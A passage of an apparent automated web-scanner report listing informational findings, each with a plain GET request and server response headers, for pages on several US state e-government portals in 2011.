Last-Modified: Thu, 03 Feb 2005 04:44:18 GMT
Accept-Ranges: bytes
ETag: "07d205ab9c51:b3e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:40:44 GMT
Connection: close

<html>

<head>
<script>
function GotoUrl(url)
{
   

// Append the current hostname to the server request so that the server has
// the top level host name. This is needed to supp
...[SNIP]...

26.34. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://treas-secure.treas.state.mi.us
Path:   /eservice_enu/start.swe

Request

GET /eservice_enu/start.swe?SWECmd=GetCachedFrame&_sn=BDkjKBekpE2aQW.txkaeXqJWDwtWzC4yVeCYeVfD9oE_&SWEC=1&SWEFrame=top._swe HTTP/1.1
Host: treas-secure.treas.state.mi.us
Connection: keep-alive
Referer: https://treas-secure.treas.state.mi.us/eservice_enu/start.swe?SWECmd=Start&SWEHo=treas-secure.treas.state.mi.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sn=BDkjKBekpE2aQW.txkaeXqJWDwtWzC4yVeCYeVfD9oE_

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 01:31:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
content-language: en
cache-control: private
content-type: text/html;charset=UTF-8
Content-Length: 64

<html>
<script>
top.swe = window;
</script>
</frameset>
</html>

26.35. https://web.globalpay.com/taxpayer/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://web.globalpay.com
Path:   /taxpayer/default.asp

Request

GET /taxpayer/default.asp HTTP/1.1
Host: web.globalpay.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:29:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1095
Content-Type: text/html
Set-Cookie: CISESSIONID=a928f6218ded1a429f519b1e54f13c00ICE89; path=/
Set-Cookie: ASPSESSIONIDQAQCCRDC=DKIDEAACBINHDMEGFHEFNLAD; path=/
Cache-control: private

<HTML><HEAD><TITLE>Unisys Internet Commerce Enabler Error Message</TITLE></HEAD><BODY><table width=100% border=0><tr><td rowspan=2 bordercolor=#0033FF><img src=/CISystem/Images/Globe.gif width=147 hei
...[SNIP]...

26.36. https://www.accesskansas.org/businesscenter/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /businesscenter/index.html

Request

GET /businesscenter/index.html HTTP/1.1
Host: www.accesskansas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerSEC-01=RlI42CO99XZ0pkZi2/r4yXnQdKxpyuX4tX5u6oa50GehoO6ZH/bk9aewHnsaDJGTV5ffMB3VT8faNEQ=; JSESSIONID=98EA5D3BDE2A32469509184A63EF9BC9.aptcs03-inst0; BIGipServerAPTCS03=755898796.38943.0000;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6002DAF7EA0788EC7E76909CE718C6DB.aptc08-inst1; Path=/businesscenter
Content-Type: text/html
Content-Length: 7678
Date: Sat, 30 Apr 2011 12:29:28 GMT
Connection: close
Set-Cookie: BIGipServerAPTC-08=50GZb+EeVt2EsWBi2/r4yXnQdKxpyl9D5SpxrI79Y5IzkVl4IWp2Ps4JBy5C7p/6Xgu9rxKETzSItw==; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

26.37. https://www.accesskansas.org/dissolutions/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /dissolutions/index.do

Request

GET /dissolutions/index.do HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Referer: http://www.kansas.gov/services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=98EA5D3BDE2A32469509184A63EF9BC9.aptcs03-inst0; BIGipServerAPTCS03=755898796.38943.0000

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Sat, 30 Apr 2011 11:22:47 GMT
Content-Length: 7100


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...

26.38. https://www.accesskansas.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.accesskansas.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.accesskansas.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerAPTCS03=755898796.38943.0000; BIGipServerSEC-01=RlI42CO99XZ0pkZi2/r4yXnQdKxpyuX4tX5u6oa50GehoO6ZH/bk9aewHnsaDJGTV5ffMB3VT8faNEQ=

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:22:54 GMT
Server: Apache
Last-Modified: Thu, 07 Sep 2006 17:40:25 GMT
ETag: "431a15-e36-9632b440"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...................................J...............e.......!...v...=.......u...........Y...y... ...H...............................#...8...K.
...[SNIP]...

26.39. https://www.alabamainteractive.org/abc_license/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.alabamainteractive.org
Path:   /abc_license/

Request

GET /abc_license/ HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Referer: http://www.alabama.gov/portal/secondary.jsp?id=professional
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:24:51 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcWSekZskj886PHHaK_s; path=/
Keep-Alive: timeout=20, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3284


<link rel='stylesheet' href='content/common/styleSheet.jsp' type='text/css'/>

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="containerTable">
...[SNIP]...

26.40. https://www.alabamainteractive.org/abc_license/content/common/styleSheet.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.alabamainteractive.org
Path:   /abc_license/content/common/styleSheet.jsp

Request

GET /abc_license/content/common/styleSheet.jsp HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Referer: https://www.alabamainteractive.org/abc_license/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcZcJfPy2b9VciC3-J_s

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:24:54 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
ETag: "AAAAS58qcwQ"
Last-Modified: Thu, 03 Mar 2011 17:00:26 GMT
Keep-Alive: timeout=20, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 5530

<head>
<title>Alcoholic Beverage Control Board License Renewal</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<STYLE TYPE="text/css">
@media print { .doNotPrint {
...[SNIP]...

26.41. https://www.bbb.org/online/consumer/cks.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bbb.org
Path:   /online/consumer/cks.aspx

Request

GET /online/consumer/cks.aspx HTTP/1.1
Host: www.bbb.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 30 Apr 2011 12:29:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: private
Content-Length: 7622
Set-Cookie: BBB_Cookie=3886160556.20480.0000; path=/
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   B
...[SNIP]...

26.42. https://www.colorado.gov/apps/dps/mvvs/public/entry.jsf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.colorado.gov
Path:   /apps/dps/mvvs/public/entry.jsf

Request

GET /apps/dps/mvvs/public/entry.jsf HTTP/1.1
Host: www.colorado.gov
Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1304162030.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; SS_X_JSESSIONID=D897788B32D48DF56BEF7CA83E980EC0; __utma=1.1441110685.1304162030.1304162030.1304162030.1; __utmc=1; __utmb=1.92.10.1304162030; BIGipServer=515899402.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:21:46 GMT
Server: Resin/3.0.19
Cache-Control: private
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: JSESSIONID=bb1Yl5CUrn27evjjM_; path=/; HttpOnly
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Set-Cookie: BIGipServer=7fjIXX1aTzGr3LYHgshLK90xd+63v7WQuTv+v/YdrkyryilxVTd5vQ+ArfW4Hip1clZP7Myw93v9sw==; path=/
Content-Length: 8075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

26.43. https://www.compasssmartshopper.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.compasssmartshopper.com
Path:   /WebResource.axd

Request

GET /WebResource.axd HTTP/1.1
Host: www.compasssmartshopper.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13885
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 12:30:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

</title>

...[SNIP]...

26.44. https://www.compasssmartshopper.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.compasssmartshopper.com
Path:   /default.aspx

Request

GET /default.aspx HTTP/1.1
Host: www.compasssmartshopper.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28042
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:38:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Compass Smar
...[SNIP]...

26.45. https://www.compasssmartshopper.com/passwordrecovery.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.compasssmartshopper.com
Path:   /passwordrecovery.aspx

Request

GET /passwordrecovery.aspx HTTP/1.1
Host: www.compasssmartshopper.com
Connection: keep-alive
Referer: https://www.compasssmartshopper.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17797
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:39:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Compass Advi
...[SNIP]...

26.46. https://www.ehawaii.gov/efile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ehawaii.gov
Path:   /efile/

Request

GET /efile/ HTTP/1.1
Host: www.ehawaii.gov
Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:16 GMT
Server: Apache
Content-Type: text/html
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 8712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv=
...[SNIP]...

26.47. https://www.ehawaii.gov/efile/js/jquery-1.2.6.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ehawaii.gov
Path:   /efile/js/jquery-1.2.6.min.js

Request

GET /efile/js/jquery-1.2.6.min.js HTTP/1.1
Host: www.ehawaii.gov
Connection: keep-alive
Referer: https://www.ehawaii.gov/efile/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:15:46 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 00:28:35 GMT
ETag: "110e6b-d9c5-6dc9b2c0"
Accept-Ranges: bytes
Content-Length: 55749
Content-Type: text/x-js
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2008/12/2
...[SNIP]...

26.48. https://www.humanservices.state.pa.us/siteminderagent/forms/calen2.fcc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.humanservices.state.pa.us
Path:   /siteminderagent/forms/calen2.fcc

Request

GET /siteminderagent/forms/calen2.fcc?TYPE=33554433&REALMOID=06-6bf57489-709c-4b0f-93ec-a014929f28e8&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-O6VbVPPZehMw7tYKEakzIbtfDivezVg7y1gUs6%2f9n8l%2b4LLrUZ9nu4dbQaUQ3GsX&TARGET=-SM-HTTPS%3a%2f%2fwww%2ehumanservices%2estate%2epa%2eus%2fCompass%2eWeb%2fOCOA%2fpgm%2fEN%2fCAPRD%2easpx%3faction%3dlogin%26language%3dEN HTTP/1.1
Host: www.humanservices.state.pa.us
Connection: keep-alive
Referer: https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt; LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS
Date: Sat, 30 Apr 2011 00:59:02 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-type: text/html

<!--SiteMinder Encoding=ISO-8859-1; -->
<!--//CALOG English Version-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Welcome to the Pennsylvania Department of Pu
...[SNIP]...

26.49. https://www.insightexpressai.com/adServer/adServer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.insightexpressai.com
Path:   /adServer/adServer.aspx

Request

GET /adServer/adServer.aspx HTTP/1.1
Host: www.insightexpressai.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 30 Apr 2011 12:39:06 GMT
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sat, 30 Apr 2011 12:39:06 GMT
Connection: close
Content-Length: 21

//banner not found: 0

26.50. https://www.ncourt.com/forms/DE/navigation.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ncourt.com
Path:   /forms/DE/navigation.aspx

Request

GET /forms/DE/navigation.aspx HTTP/1.1
Host: www.ncourt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=phc1ex55fgr0kwaqs5uluqb4; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21619


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="_ctl0_Head1">

...[SNIP]...

26.51. https://www.tennesseeanytime.org/biztax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /biztax/

Request

GET /biztax/ HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:58:45 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

26.52. https://www.tennesseeanytime.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s; __unam=53ea465-12fa3eacf85-221b441d-2

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:09 GMT
Server: Apache
Last-Modified: Mon, 14 Feb 2011 19:38:27 GMT
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@......................................'...........................'...............................r...................................r......................
...[SNIP]...

26.53. https://www.tennesseeanytime.org/includes/alert/alert.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /includes/alert/alert.shtml

Request

GET /includes/alert/alert.shtml HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s; __unam=53ea465-12fa3eacf85-221b441d-1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:06 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- NO ALERT INCLUDES -->
<div class="alert"> <!-- Alert div do not change -->
</div>

26.54. https://www.tennesseeanytime.org/pmnout/notice/listByMonth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.tennesseeanytime.org
Path:   /pmnout/notice/listByMonth

Request

GET /pmnout/notice/listByMonth?year=2011&month=4&day=29 HTTP/1.1
Host: www.tennesseeanytime.org
Connection: keep-alive
Referer: https://www.tennesseeanytime.org/biztax/
X-Prototype-Version: 1.6.0.2
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECmL1dTx_a79PJ6J_s; __unam=53ea465-12fa3eacf85-221b441d-1

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:07 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

26.55. https://www.vermontjoblink.com/ada/404/404_qry.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/404/404_qry.cfm

Request

GET /ada/404/404_qry.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:01 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

